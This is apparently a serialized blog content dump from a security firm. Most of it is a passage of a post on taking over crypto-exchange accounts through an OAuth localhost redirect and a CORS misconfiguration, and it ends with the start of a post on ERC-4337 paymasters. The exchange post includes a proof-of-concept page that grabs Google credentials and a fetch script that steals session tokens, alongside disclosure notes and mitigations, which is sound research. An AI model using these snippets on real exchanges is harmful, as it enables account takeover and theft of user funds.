"value":74821},{"type":25,"tag":216,"props":105089,"children":105090},{"style":6964},[105091],{"type":31,"value":18761},{"type":25,"tag":216,"props":105093,"children":105094},{"class":6922,"line":7730},[105095,105099,105103],{"type":25,"tag":216,"props":105096,"children":105097},{"style":6964},[105098],{"type":31,"value":74833},{"type":25,"tag":216,"props":105100,"children":105101},{"style":7047},[105102],{"type":31,"value":74838},{"type":25,"tag":216,"props":105104,"children":105105},{"style":6964},[105106],{"type":31,"value":7241},{"type":25,"tag":216,"props":105108,"children":105109},{"class":6922,"line":7760},[105110,105114],{"type":25,"tag":216,"props":105111,"children":105112},{"style":7047},[105113],{"type":31,"value":74850},{"type":25,"tag":216,"props":105115,"children":105116},{"style":6964},[105117],{"type":31,"value":7241},{"type":25,"tag":216,"props":105119,"children":105120},{"class":6922,"line":7768},[105121,105125,105129,105134],{"type":25,"tag":216,"props":105122,"children":105123},{"style":7047},[105124],{"type":31,"value":74927},{"type":25,"tag":216,"props":105126,"children":105127},{"style":6964},[105128],{"type":31,"value":1850},{"type":25,"tag":216,"props":105130,"children":105131},{"style":8205},[105132],{"type":31,"value":105133},"\"Test\"",{"type":25,"tag":216,"props":105135,"children":105136},{"style":6964},[105137],{"type":31,"value":7107},{"type":25,"tag":216,"props":105139,"children":105140},{"class":6922,"line":7800},[105141,105145],{"type":25,"tag":216,"props":105142,"children":105143},{"style":7047},[105144],{"type":31,"value":74993},{"type":25,"tag":216,"props":105146,"children":105147},{"style":6964},[105148],{"type":31,"value":7241},{"type":25,"tag":216,"props":105150,"children":105151},{"class":6922,"line":7808},[105152,105157,105161],{"type":25,"tag":216,"props":105153,"children":105154},{"style":6964},[105155],{"type":31,"value":105156},"                                src ",{"type":25,"tag":216,"props":105158,"children":105159},{"style":6953},[105160],{"type":31,"value":266},{"type":25,"tag":216,"props":105162,"children":105163},{"style":8205},[105164],{"type":31,"value":105165}," \"https://accounts.google.com/gsi/client\"\n",{"type":25,"tag":216,"props":105167,"children":105168},{"class":6922,"line":7868},[105169,105174,105179,105183,105187],{"type":25,"tag":216,"props":105170,"children":105171},{"style":6964},[105172],{"type":31,"value":105173},"                                attributes[",{"type":25,"tag":216,"props":105175,"children":105176},{"style":8205},[105177],{"type":31,"value":105178},"\"async\"",{"type":25,"tag":216,"props":105180,"children":105181},{"style":6964},[105182],{"type":31,"value":12614},{"type":25,"tag":216,"props":105184,"children":105185},{"style":6953},[105186],{"type":31,"value":266},{"type":25,"tag":216,"props":105188,"children":105189},{"style":8205},[105190],{"type":31,"value":105191}," \"\"\n",{"type":25,"tag":216,"props":105193,"children":105194},{"class":6922,"line":13001},[105195,105199,105204,105208,105212],{"type":25,"tag":216,"props":105196,"children":105197},{"style":6964},[105198],{"type":31,"value":105173},{"type":25,"tag":216,"props":105200,"children":105201},{"style":8205},[105202],{"type":31,"value":105203},"\"defer\"",{"type":25,"tag":216,"props":105205,"children":105206},{"style":6964},[105207],{"type":31,"value":12614},{"type":25,"tag":216,"props":105209,"children":105210},{"style":6953},[105211],{"type":31,"value":266},{"type":25,"tag":216,"props":105213,"children":105214},{"style":8205},[105215],{"type":31,"value":105191},{"type":25,"tag":216,"props":105217,"children":105218},{"class":6922,"line":13019},[105219],{"type":25,"tag":216,"props":105220,"children":105221},{"style":6964},[105222],{"type":31,"value":75018},{"type":25,"tag":216,"props":105224,"children":105225},{"class":6922,"line":13064},[105226,105230],{"type":25,"tag":216,"props":105227,"children":105228},{"style":7047},[105229],{"type":31,"value":74993},{"type":25,"tag":216,"props":105231,"children":105232},{"style":6964},[105233],{"type":31,"value":7241},{"type":25,"tag":216,"props":105235,"children":105236},{"class":6922,"line":13170},[105237,105242],{"type":25,"tag":216,"props":105238,"children":105239},{"style":7047},[105240],{"type":31,"value":105241},"                                unsafe",{"type":25,"tag":216,"props":105243,"children":105244},{"style":6964},[105245],{"type":31,"value":7241},{"type":25,"tag":216,"props":105247,"children":105248},{"class":6922,"line":27455},[105249,105254],{"type":25,"tag":216,"props":105250,"children":105251},{"style":6953},[105252],{"type":31,"value":105253},"                                    +",{"type":25,"tag":216,"props":105255,"children":105256},{"style":8205},[105257],{"type":31,"value":105258},"\"\"\"\n",{"type":25,"tag":216,"props":105260,"children":105261},{"class":6922,"line":27490},[105262],{"type":25,"tag":216,"props":105263,"children":105264},{"style":8205},[105265],{"type":31,"value":105266},"    function handleCredentialResponse(response) {\n",{"type":25,"tag":216,"props":105268,"children":105269},{"class":6922,"line":27498},[105270],{"type":25,"tag":216,"props":105271,"children":105272},{"style":8205},[105273],{"type":31,"value":105274},"      alert(\"credential: \" + response.credential);\n",{"type":25,"tag":216,"props":105276,"children":105277},{"class":6922,"line":27506},[105278],{"type":25,"tag":216,"props":105279,"children":105280},{"style":8205},[105281],{"type":31,"value":7311},{"type":25,"tag":216,"props":105283,"children":105284},{"class":6922,"line":27515},[105285],{"type":25,"tag":216,"props":105286,"children":105287},{"emptyLinePlaceholder":16},[105288],{"type":31,"value":7642},{"type":25,"tag":216,"props":105290,"children":105291},{"class":6922,"line":27557},[105292],{"type":25,"tag":216,"props":105293,"children":105294},{"style":8205},[105295],{"type":31,"value":105296},"    window.onload = async function () {\n",{"type":25,"tag":216,"props":105298,"children":105299},{"class":6922,"line":27590},[105300],{"type":25,"tag":216,"props":105301,"children":105302},{"style":8205},[105303],{"type":31,"value":105304},"      const oauth_url = new URL(`https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?as=uolEFCMgoGJXBVuGdJja0XdzjrWqOE6iFaK1SBNY9Zk&client_id=redacted&scope=openid%20email%20profile&response_type=id_token&gsiwebsdk=gis_attributes&redirect_uri=http%3A%2F%2Flocalhost%3A3000&response_mode=form_post&origin=http%3A%2F%2Flocalhost%3A3000&display=popup&prompt=select_account&gis_params=ChFodHRwczovL2F6Yml0LmNvbRIRaHR0cHM6Ly9hemJpdC5jb20YByordW9sRUZDTWdvR0pYQlZ1R2RKamEwWGR6anJXcU9FNmlGYUsxU0JOWTlaazJINzE3OTQyNTg0NjQyLXVrb25tbDZkNXM0MjJrZWVpa2RmMTJwdnV1aG1sOWYyLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tOAFCQDI0NDlkNGMwMTI3NDQxNGRlMzg5YjFlYjE1MzFmYTAxYTdjM2M5MTFhOTMxNzIxNGJhZTFmODkzNjE2MzIxZDA&service=lso&o2v=1&flowName=GeneralOAuthFlow`);\n",{"type":25,"tag":216,"props":105306,"children":105307},{"class":6922,"line":27598},[105308],{"type":25,"tag":216,"props":105309,"children":105310},{"style":8205},[105311],{"type":31,"value":105312},"      const client_id = oauth_url.searchParams.get(\"client_id\");\n",{"type":25,"tag":216,"props":105314,"children":105315},{"class":6922,"line":27606},[105316],{"type":25,"tag":216,"props":105317,"children":105318},{"style":8205},[105319],{"type":31,"value":105320},"      google.accounts.id.initialize({\n",{"type":25,"tag":216,"props":105322,"children":105323},{"class":6922,"line":27615},[105324],{"type":25,"tag":216,"props":105325,"children":105326},{"style":8205},[105327],{"type":31,"value":105328},"        client_id: client_id,\n",{"type":25,"tag":216,"props":105330,"children":105331},{"class":6922,"line":27691},[105332],{"type":25,"tag":216,"props":105333,"children":105334},{"style":8205},[105335],{"type":31,"value":105336},"        callback: handleCredentialResponse,\n",{"type":25,"tag":216,"props":105338,"children":105339},{"class":6922,"line":27724},[105340],{"type":25,"tag":216,"props":105341,"children":105342},{"style":8205},[105343],{"type":31,"value":105344},"        auto_select: true\n",{"type":25,"tag":216,"props":105346,"children":105347},{"class":6922,"line":27732},[105348],{"type":25,"tag":216,"props":105349,"children":105350},{"style":8205},[105351],{"type":31,"value":11248},{"type":25,"tag":216,"props":105353,"children":105354},{"class":6922,"line":27740},[105355],{"type":25,"tag":216,"props":105356,"children":105357},{"emptyLinePlaceholder":16},[105358],{"type":31,"value":7642},{"type":25,"tag":216,"props":105360,"children":105361},{"class":6922,"line":27777},[105362],{"type":25,"tag":216,"props":105363,"children":105364},{"style":8205},[105365],{"type":31,"value":105366},"      google.accounts.id.renderButton(\n",{"type":25,"tag":216,"props":105368,"children":105369},{"class":6922,"line":27790},[105370],{"type":25,"tag":216,"props":105371,"children":105372},{"style":8205},[105373],{"type":31,"value":105374},"        document.getElementById(\"g_id_signin\"),\n",{"type":25,"tag":216,"props":105376,"children":105377},{"class":6922,"line":27803},[105378],{"type":25,"tag":216,"props":105379,"children":105380},{"style":8205},[105381],{"type":31,"value":105382},"        { theme: \"outline\", size: \"large\" }\n",{"type":25,"tag":216,"props":105384,"children":105385},{"class":6922,"line":27816},[105386],{"type":25,"tag":216,"props":105387,"children":105388},{"style":8205},[105389],{"type":31,"value":10718},{"type":25,"tag":216,"props":105391,"children":105392},{"class":6922,"line":27870},[105393],{"type":25,"tag":216,"props":105394,"children":105395},{"emptyLinePlaceholder":16},[105396],{"type":31,"value":7642},{"type":25,"tag":216,"props":105398,"children":105399},{"class":6922,"line":27879},[105400],{"type":25,"tag":216,"props":105401,"children":105402},{"style":8205},[105403],{"type":31,"value":105404},"      google.accounts.id.prompt();\n",{"type":25,"tag":216,"props":105406,"children":105407},{"class":6922,"line":36243},[105408],{"type":25,"tag":216,"props":105409,"children":105410},{"style":8205},[105411],{"type":31,"value":42960},{"type":25,"tag":216,"props":105413,"children":105414},{"class":6922,"line":36264},[105415,105420,105424,105429],{"type":25,"tag":216,"props":105416,"children":105417},{"style":8205},[105418],{"type":31,"value":105419},"                                    \"\"\"",{"type":25,"tag":216,"props":105421,"children":105422},{"style":6964},[105423],{"type":31,"value":179},{"type":25,"tag":216,"props":105425,"children":105426},{"style":7047},[105427],{"type":31,"value":105428},"trimIndent",{"type":25,"tag":216,"props":105430,"children":105431},{"style":6964},[105432],{"type":31,"value":11687},{"type":25,"tag":216,"props":105434,"children":105435},{"class":6922,"line":84923},[105436],{"type":25,"tag":216,"props":105437,"children":105438},{"style":6964},[105439],{"type":31,"value":105440},"                                }\n",{"type":25,"tag":216,"props":105442,"children":105443},{"class":6922,"line":84936},[105444],{"type":25,"tag":216,"props":105445,"children":105446},{"style":6964},[105447],{"type":31,"value":75018},{"type":25,"tag":216,"props":105449,"children":105450},{"class":6922,"line":84944},[105451],{"type":25,"tag":216,"props":105452,"children":105453},{"style":6964},[105454],{"type":31,"value":74948},{"type":25,"tag":216,"props":105456,"children":105457},{"class":6922,"line":84952},[105458,105462],{"type":25,"tag":216,"props":105459,"children":105460},{"style":7047},[105461],{"type":31,"value":74956},{"type":25,"tag":216,"props":105463,"children":105464},{"style":6964},[105465],{"type":31,"value":7241},{"type":25,"tag":216,"props":105467,"children":105468},{"class":6922,"line":84960},[105469,105473,105477,105481,105486],{"type":25,"tag":216,"props":105470,"children":105471},{"style":7047},[105472],{"type":31,"value":74968},{"type":25,"tag":216,"props":105474,"children":105475},{"style":6964},[105476],{"type":31,"value":13542},{"type":25,"tag":216,"props":105478,"children":105479},{"style":6953},[105480],{"type":31,"value":3539},{"type":25,"tag":216,"props":105482,"children":105483},{"style":8205},[105484],{"type":31,"value":105485},"\"Login here:\"",{"type":25,"tag":216,"props":105487,"children":105488},{"style":6964},[105489],{"type":31,"value":13552},{"type":25,"tag":216,"props":105491,"children":105492},{"class":6922,"line":85000},[105493,105498],{"type":25,"tag":216,"props":105494,"children":105495},{"style":7047},[105496],{"type":31,"value":105497},"                            div",{"type":25,"tag":216,"props":105499,"children":105500},{"style":6964},[105501],{"type":31,"value":7241},{"type":25,"tag":216,"props":105503,"children":105504},{"class":6922,"line":85008},[105505,105510,105514],{"type":25,"tag":216,"props":105506,"children":105507},{"style":6964},[105508],{"type":31,"value":105509},"                                id ",{"type":25,"tag":216,"props":105511,"children":105512},{"style":6953},[105513],{"type":31,"value":266},{"type":25,"tag":216,"props":105515,"children":105516},{"style":8205},[105517],{"type":31,"value":105518}," \"g_id_signin\"\n",{"type":25,"tag":216,"props":105520,"children":105521},{"class":6922,"line":92194},[105522],{"type":25,"tag":216,"props":105523,"children":105524},{"style":6964},[105525],{"type":31,"value":75018},{"type":25,"tag":216,"props":105527,"children":105528},{"class":6922,"line":92202},[105529],{"type":25,"tag":216,"props":105530,"children":105531},{"style":6964},[105532],{"type":31,"value":74948},{"type":25,"tag":216,"props":105534,"children":105536},{"class":6922,"line":105535},62,[105537],{"type":25,"tag":216,"props":105538,"children":105539},{"style":6964},[105540],{"type":31,"value":75033},{"type":25,"tag":216,"props":105542,"children":105544},{"class":6922,"line":105543},63,[105545],{"type":25,"tag":216,"props":105546,"children":105547},{"style":6964},[105548],{"type":31,"value":75041},{"type":25,"tag":216,"props":105550,"children":105552},{"class":6922,"line":105551},64,[105553],{"type":25,"tag":216,"props":105554,"children":105555},{"style":6964},[105556],{"type":31,"value":62852},{"type":25,"tag":216,"props":105558,"children":105560},{"class":6922,"line":105559},65,[105561,105565,105569,105573,105577,105581],{"type":25,"tag":216,"props":105562,"children":105563},{"style":6964},[105564],{"type":31,"value":75056},{"type":25,"tag":216,"props":105566,"children":105567},{"style":7047},[105568],{"type":31,"value":75061},{"type":25,"tag":216,"props":105570,"children":105571},{"style":6964},[105572],{"type":31,"value":75066},{"type":25,"tag":216,"props":105574,"children":105575},{"style":6953},[105576],{"type":31,"value":266},{"type":25,"tag":216,"props":105578,"children":105579},{"style":6936},[105580],{"type":31,"value":16425},{"type":25,"tag":216,"props":105582,"children":105583},{"style":6964},[105584],{"type":31,"value":7107},{"type":25,"tag":216,"props":105586,"children":105588},{"class":6922,"line":105587},66,[105589],{"type":25,"tag":216,"props":105590,"children":105591},{"style":6964},[105592],{"type":31,"value":7311},{"type":25,"tag":38,"props":105594,"children":105595},{},[105596],{"type":31,"value":105597},"We also reported this vulnerability to the Web3Auth mobile SDK, Slush Wallet, Kukai Wallet, and several other web3 platforms. As mentioned earlier, this issue could have allowed account takeover with zero user interaction if the user had installed an application that exploited the localhost redirect.",{"type":25,"tag":38,"props":105599,"children":105600},{},[105601],{"type":31,"value":105602},"Each team responded promptly, communicated clearly, and shipped fixes quickly. Their diligence set a strong example for coordinated response and helped ensure user security across the ecosystem.",{"type":25,"tag":606,"props":105604,"children":105606},{"id":105605},"how-to-mitigate",[105607],{"type":31,"value":105608},"How to Mitigate",{"type":25,"tag":38,"props":105610,"children":105611},{},[105612],{"type":31,"value":105613},"The proper way to mitigate this issue is to disallow localhost in the live environment. Developers should have a separate staging OAuth environment with a different client ID for testing purposes. It's important to ensure that tokens generated using the test client ID are not valid in the live environment.",{"type":25,"tag":26,"props":105615,"children":105617},{"id":105616},"exploiting-cors",[105618],{"type":31,"value":105619},"Exploiting CORS",{"type":25,"tag":38,"props":105621,"children":105622},{},[105623],{"type":31,"value":105624},"Another bug we found during our research was related to CORS misconfiguration and how different browsers handle mixed content requests.",{"type":25,"tag":38,"props":105626,"children":105627},{},[105628,105630,105636],{"type":31,"value":105629},"While checking for other bugs in exchanges, we found a CORS (Cross-Origin Resource Sharing) configuration allowing credentials and ",{"type":25,"tag":82,"props":105631,"children":105633},{"className":105632},[],[105634],{"type":31,"value":105635},"http://",{"type":31,"value":105637}," schema for any subdomain:",{"type":25,"tag":206,"props":105639,"children":105643},{"className":105640,"code":105641,"language":105642,"meta":7,"style":7},"language-http shiki shiki-themes slack-dark","HTTP 200 OK\nAccess-Control-Allow-Origin: http://aa.exchange.com\nAccess-Control-Allow-Credentials: true\n[...]\n","http",[105644],{"type":25,"tag":82,"props":105645,"children":105646},{"__ignoreMap":7},[105647,105655,105663,105671],{"type":25,"tag":216,"props":105648,"children":105649},{"class":6922,"line":6923},[105650],{"type":25,"tag":216,"props":105651,"children":105652},{},[105653],{"type":31,"value":105654},"HTTP 200 OK\n",{"type":25,"tag":216,"props":105656,"children":105657},{"class":6922,"line":6769},[105658],{"type":25,"tag":216,"props":105659,"children":105660},{},[105661],{"type":31,"value":105662},"Access-Control-Allow-Origin: http://aa.exchange.com\n",{"type":25,"tag":216,"props":105664,"children":105665},{"class":6922,"line":6778},[105666],{"type":25,"tag":216,"props":105667,"children":105668},{},[105669],{"type":31,"value":105670},"Access-Control-Allow-Credentials: true\n",{"type":25,"tag":216,"props":105672,"children":105673},{"class":6922,"line":7005},[105674],{"type":25,"tag":216,"props":105675,"children":105676},{},[105677],{"type":31,"value":14275},{"type":25,"tag":606,"props":105679,"children":105681},{"id":105680},"cors-misconfiguration-by-lack-of-tls",[105682],{"type":31,"value":105683},"CORS Misconfiguration by Lack of TLS",{"type":25,"tag":38,"props":105685,"children":105686},{},[105687,105689,105695],{"type":31,"value":105688},"This case requires specific preconditions. The idea is to redirect the user to an insecure subdomain of ",{"type":25,"tag":82,"props":105690,"children":105692},{"className":105691},[],[105693],{"type":31,"value":105694},"exchange.com",{"type":31,"value":105696}," and spoof the response by intercepting and tampering with the victim's network packets.",{"type":25,"tag":38,"props":105698,"children":105699},{},[105700],{"type":31,"value":105701},"However, while testing it by simulating an MITM attack, we figured out that this type of attack behaves differently amongst the main browsers:",{"type":25,"tag":2039,"props":105703,"children":105704},{},[105705,105725],{"type":25,"tag":2043,"props":105706,"children":105707},{},[105708,105710,105715,105717,105723],{"type":31,"value":105709},"Chrome --> won't work because cookies are not sent in ",{"type":25,"tag":82,"props":105711,"children":105713},{"className":105712},[],[105714],{"type":31,"value":105635},{"type":31,"value":105716}," --> ",{"type":25,"tag":82,"props":105718,"children":105720},{"className":105719},[],[105721],{"type":31,"value":105722},"https://",{"type":31,"value":105724}," requests, even if same-site",{"type":25,"tag":2043,"props":105726,"children":105727},{},[105728,105730],{"type":31,"value":105729},"Firefox and Safari --> works since cookies are sent from an insecure context ",{"type":25,"tag":82,"props":105731,"children":105733},{"className":105732},[],[105734],{"type":31,"value":41728},{"type":25,"tag":606,"props":105736,"children":105738},{"id":105737},"exploit-1",[105739],{"type":31,"value":104069},{"type":25,"tag":38,"props":105741,"children":105742},{},[105743],{"type":31,"value":105744},"To exploit it, we must follow some steps:",{"type":25,"tag":6711,"props":105746,"children":105747},{},[105748,105753,105758],{"type":25,"tag":2043,"props":105749,"children":105750},{},[105751],{"type":31,"value":105752},"Force the victim to enter an insecure webpage in the exchange subdomain",{"type":25,"tag":2043,"props":105754,"children":105755},{},[105756],{"type":31,"value":105757},"Deliver the malicious script to the victim using MITM (Man-In-The-Middle)",{"type":25,"tag":2043,"props":105759,"children":105760},{},[105761,105763,105768],{"type":31,"value":105762},"Use ",{"type":25,"tag":82,"props":105764,"children":105766},{"className":105765},[],[105767],{"type":31,"value":41728},{"type":31,"value":105769}," with CORS to do something malicious using the victim's account",{"type":25,"tag":38,"props":105771,"children":105772},{},[105773],{"type":31,"value":105774},"To exploit the CORS issue, an attacker must first get the victim to load an insecure subdomain. This can be achieved through techniques such as spoofing Wi-Fi or creating a fake public network that automatically opens the insecure page as the captive portal.",{"type":25,"tag":38,"props":105776,"children":105777},{},[105778,105780,105785],{"type":31,"value":105779},"Once the redirect to the ",{"type":25,"tag":82,"props":105781,"children":105783},{"className":105782},[],[105784],{"type":31,"value":105635},{"type":31,"value":105786}," website is made, if the attacker is in an adjacent network, it is possible to intercept the HTTP request/response (or DNS resolve) and tamper with the returning page. The returning page should have a malicious script that exploits the CORS misconfiguration:",{"type":25,"tag":206,"props":105788,"children":105790},{"className":35325,"code":105789,"language":35327,"meta":7,"style":7},"(async () => {\n  let res = await fetch('https://www.exchange.com/api/session_token', {\n    credentials: 'include',\n    method: 'POST',\n  });\n  console.log(await res.json());\n})();\n",[105791],{"type":25,"tag":82,"props":105792,"children":105793},{"__ignoreMap":7},[105794,105817,105854,105871,105888,105895,105936],{"type":25,"tag":216,"props":105795,"children":105796},{"class":6922,"line":6923},[105797,105801,105805,105809,105813],{"type":25,"tag":216,"props":105798,"children":105799},{"style":6964},[105800],{"type":31,"value":1850},{"type":25,"tag":216,"props":105802,"children":105803},{"style":6936},[105804],{"type":31,"value":40108},{"type":25,"tag":216,"props":105806,"children":105807},{"style":6964},[105808],{"type":31,"value":43660},{"type":25,"tag":216,"props":105810,"children":105811},{"style":6936},[105812],{"type":31,"value":18779},{"type":25,"tag":216,"props":105814,"children":105815},{"style":6964},[105816],{"type":31,"value":7241},{"type":25,"tag":216,"props":105818,"children":105819},{"class":6922,"line":6769},[105820,105824,105829,105833,105837,105841,105845,105850],{"type":25,"tag":216,"props":105821,"children":105822},{"style":6936},[105823],{"type":31,"value":11807},{"type":25,"tag":216,"props":105825,"children":105826},{"style":6947},[105827],{"type":31,"value":105828}," res",{"type":25,"tag":216,"props":105830,"children":105831},{"style":6953},[105832],{"type":31,"value":6956},{"type":25,"tag":216,"props":105834,"children":105835},{"style":6973},[105836],{"type":31,"value":40174},{"type":25,"tag":216,"props":105838,"children":105839},{"style":7047},[105840],{"type":31,"value":36891},{"type":25,"tag":216,"props":105842,"children":105843},{"style":6964},[105844],{"type":31,"value":1850},{"type":25,"tag":216,"props":105846,"children":105847},{"style":8205},[105848],{"type":31,"value":105849},"'https://www.exchange.com/api/session_token'",{"type":25,"tag":216,"props":105851,"children":105852},{"style":6964},[105853],{"type":31,"value":52851},{"type":25,"tag":216,"props":105855,"children":105856},{"class":6922,"line":6778},[105857,105862,105867],{"type":25,"tag":216,"props":105858,"children":105859},{"style":6947},[105860],{"type":31,"value":105861},"    credentials:",{"type":25,"tag":216,"props":105863,"children":105864},{"style":8205},[105865],{"type":31,"value":105866}," 'include'",{"type":25,"tag":216,"props":105868,"children":105869},{"style":6964},[105870],{"type":31,"value":7465},{"type":25,"tag":216,"props":105872,"children":105873},{"class":6922,"line":7005},[105874,105879,105884],{"type":25,"tag":216,"props":105875,"children":105876},{"style":6947},[105877],{"type":31,"value":105878},"    method:",{"type":25,"tag":216,"props":105880,"children":105881},{"style":8205},[105882],{"type":31,"value":105883}," 'POST'",{"type":25,"tag":216,"props":105885,"children":105886},{"style":6964},[105887],{"type":31,"value":7465},{"type":25,"tag":216,"props":105889,"children":105890},{"class":6922,"line":7110},[105891],{"type":25,"tag":216,"props":105892,"children":105893},{"style":6964},[105894],{"type":31,"value":102152},{"type":25,"tag":216,"props":105896,"children":105897},{"class":6922,"line":7216},[105898,105903,105907,105912,105916,105920,105924,105928,105932],{"type":25,"tag":216,"props":105899,"children":105900},{"style":6947},[105901],{"type":31,"value":105902},"  console",{"type":25,"tag":216,"props":105904,"children":105905},{"style":6964},[105906],{"type":31,"value":179},{"type":25,"tag":216,"props":105908,"children":105909},{"style":7047},[105910],{"type":31,"value":105911},"log",{"type":25,"tag":216,"props":105913,"children":105914},{"style":6964},[105915],{"type":31,"value":1850},{"type":25,"tag":216,"props":105917,"children":105918},{"style":6973},[105919],{"type":31,"value":36878},{"type":25,"tag":216,"props":105921,"children":105922},{"style":6947},[105923],{"type":31,"value":105828},{"type":25,"tag":216,"props":105925,"children":105926},{"style":6964},[105927],{"type":31,"value":179},{"type":25,"tag":216,"props":105929,"children":105930},{"style":7047},[105931],{"type":31,"value":37960},{"type":25,"tag":216,"props":105933,"children":105934},{"style":6964},[105935],{"type":31,"value":19382},{"type":25,"tag":216,"props":105937,"children":105938},{"class":6922,"line":7244},[105939],{"type":25,"tag":216,"props":105940,"children":105941},{"style":6964},[105942],{"type":31,"value":105943},"})();\n",{"type":25,"tag":38,"props":105945,"children":105946},{},[105947],{"type":31,"value":105948},"During our research, the misconfiguration we found was in an API with an endpoint to return the session token, so the impact was an account takeover (ATO) with some limitations since exchanges usually have MFA to perform some actions like withdrawing.",{"type":25,"tag":606,"props":105950,"children":105951},{"id":44297},[105952],{"type":31,"value":44300},{"type":25,"tag":38,"props":105954,"children":105955},{},[105956,105958,105963],{"type":31,"value":105957},"As mitigation, it is recommended to remove all ",{"type":25,"tag":82,"props":105959,"children":105961},{"className":105960},[],[105962],{"type":31,"value":105635},{"type":31,"value":105964}," URLs from the CORS configuration, including localhost, since a local web server in a mobile environment can abuse it.",{"type":25,"tag":38,"props":105966,"children":105967},{},[105968],{"type":31,"value":105969},"Also, as additional/alternative remediation, it is possible to configure the HSTS policy to include all subdomains and prevent insecure subdomains from loading in the browser.",{"type":25,"tag":26,"props":105971,"children":105972},{"id":32892},[105973],{"type":31,"value":22907},{"type":25,"tag":38,"props":105975,"children":105976},{},[105977],{"type":31,"value":105978},"In conclusion, our deep dive into authentication and client-side bugs within exchange platforms revealed several vulnerabilities stemming from misconfigurations. These types of attacks show the complexity of securing client-side applications due to the different contexts and environments they can operate in.",{"type":25,"tag":38,"props":105980,"children":105981},{},[105982],{"type":31,"value":105983},"It also demonstrates how development configurations can harm the application's security if they are also used in production. Thus, auditors must always understand in which environments and contexts the application will/can be run in, and ensure that the configurations are not insecure for use in production.",{"type":25,"tag":9316,"props":105985,"children":105986},{},[105987],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":105989},[105990,105995,106000],{"id":103674,"depth":6769,"text":103677,"children":105991},[105992,105993,105994],{"id":103685,"depth":6778,"text":103688},{"id":104042,"depth":6778,"text":104045},{"id":105605,"depth":6778,"text":105608},{"id":105616,"depth":6769,"text":105619,"children":105996},[105997,105998,105999],{"id":105680,"depth":6778,"text":105683},{"id":105737,"depth":6778,"text":104069},{"id":44297,"depth":6778,"text":44300},{"id":32892,"depth":6769,"text":22907},"content:blog:2025-10-16-how-we-broke-exchanges-oauth-misconfigurations.md","blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations.md","blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations",{"_path":106005,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":106006,"description":106007,"date":106008,"author":106009,"image":106010,"isFeatured":16,"onBlogPage":16,"tags":106012,"body":106015,"_type":6798,"_id":111787,"_source":6800,"_file":111788,"_stem":111789,"_extension":6803},"/blog/2025-12-02-paymasters-evm","ERC-4337 Paymasters: Better UX, Hidden Risks","ERC-4337 paymasters unlock powerful UX by abstracting gas costs, but they also add complexity and subtle bugs. Explore some common pitfalls in real-world implementations and learn how to design production-ready paymasters.","2025-12-02T12:00:00.000Z","nicholas",{"src":106011,"width":101226,"height":17580},"/posts/paymasters-evm/title.png",[106013,106014],"evm","ERC-4337",{"type":22,"children":106016,"toc":111766},[106017,106021,106032,106037,106042,106047,106053,106059,106064,106069,106075,106080,106108,106114,106119,106126,106131,106141,106146,106172,106178,106198,106204,106224,106232,106263,106296,106305,106317,106342,106354,106367,106410,106416,106449,106548,106567,106590,106595,106601,106629,106776,106781,106808,106814,106826,106838,106847,106882,106887,108372,108400,108421,108426,108438,108447,108452,108470,108493,108498,108504,108558,108564,108597,108632,109456,109492,109528,109594,109627,110125,110178,110190,110754,110823,110850,111472,111514,111541,111553,111614,111633,111667,111672,111677,111682,111686,111691,111726,111752,111757,111762],{"type":25,"tag":453,"props":106018,"children":106019},{"id":32975},[106020],{"type":31,"value":32978},{"type":25,"tag":38,"props":106022,"children":106023},{},[106024,106030],{"type":25,"tag":162,"props":106025,"children":106028},{"href":106026,"rel":106027},"https://docs.erc4337.io/",[166],[106029],{"type":31,"value":106014},{"type":31,"value":106031}," (Account Abstraction) has unlocked a new wave of UX improvements for Ethereum. By decoupling users from EOAs (Externally Owned Accounts), it enables smart contract wallets, gas sponsorships, and flexible authentication mechanisms.",{"type":25,"tag":38,"props":106033,"children":106034},{},[106035],{"type":31,"value":106036},"One of the most powerful features introduced by ERC-4337 is the paymaster, a contract that can sponsor gas fees for users. This allows dApps to deliver seamless, “gasless” experiences where users don’t have to hold ETH to transact.",{"type":25,"tag":38,"props":106038,"children":106039},{},[106040],{"type":31,"value":106041},"However, building a correct paymaster isn’t trivial. We’ve seen many developers trip up on subtle details of the standard, which can cause unexpected behavior or unnecessary complexity.",{"type":25,"tag":38,"props":106043,"children":106044},{},[106045],{"type":31,"value":106046},"In this article, we’ll break down how ERC-4337 works at a high level, zoom in on the paymaster’s role, and walk through the most common pitfalls we’ve observed when implementing paymasters. By the end, you’ll have a clear picture of how to design paymasters that follow best practices and are production-ready.",{"type":25,"tag":453,"props":106048,"children":106050},{"id":106049},"erc4337-overview",[106051],{"type":31,"value":106052},"ERC4337 Overview",{"type":25,"tag":26,"props":106054,"children":106056},{"id":106055},"traditional-eoas-vs-smart-contract-wallets",[106057],{"type":31,"value":106058},"Traditional EOAs vs Smart Contract Wallets",{"type":25,"tag":38,"props":106060,"children":106061},{},[106062],{"type":31,"value":106063},"In Ethereum’s early design, user accounts are Externally Owned Accounts (EOAs), controlled by a private key. When you send a transaction (e.g. token transfer or contract call), your private key signs the transaction, and you must pay gas in ETH. If the key is lost or stolen, you lose access to everything permanently. This setup is simple, but also rigid and risky.",{"type":25,"tag":38,"props":106065,"children":106066},{},[106067],{"type":31,"value":106068},"By contrast, smart contract accounts (or \"smart wallets\") are programmable. They can enforce logic like multiple signatures, spending limits, social recovery, batching, and more, automating many aspects of security and usability.",{"type":25,"tag":26,"props":106070,"children":106072},{"id":106071},"why-erc4337-was-introduced",[106073],{"type":31,"value":106074},"Why ERC‑4337 Was Introduced",{"type":25,"tag":38,"props":106076,"children":106077},{},[106078],{"type":31,"value":106079},"Smart wallets offer powerful features, but Ethereum’s protocol restricts transactions to originate only from EOAs. Previous proposals (e.g. EIP‑2938, EIP‑3074) tried to change the protocol itself, requiring a hard fork. ERC‑4337 achieves account abstraction entirely off‑chain, using higher-layer infrastructure without any changes to Ethereum’s consensus layer. This unlocks key UX improvements:",{"type":25,"tag":2039,"props":106081,"children":106082},{},[106083,106088,106093,106098,106103],{"type":25,"tag":2043,"props":106084,"children":106085},{},[106086],{"type":31,"value":106087},"User recovery for lost keys (e.g. social recovery)",{"type":25,"tag":2043,"props":106089,"children":106090},{},[106091],{"type":31,"value":106092},"Batched or atomic multi-step operations in one flow",{"type":25,"tag":2043,"props":106094,"children":106095},{},[106096],{"type":31,"value":106097},"Paying gas fees with 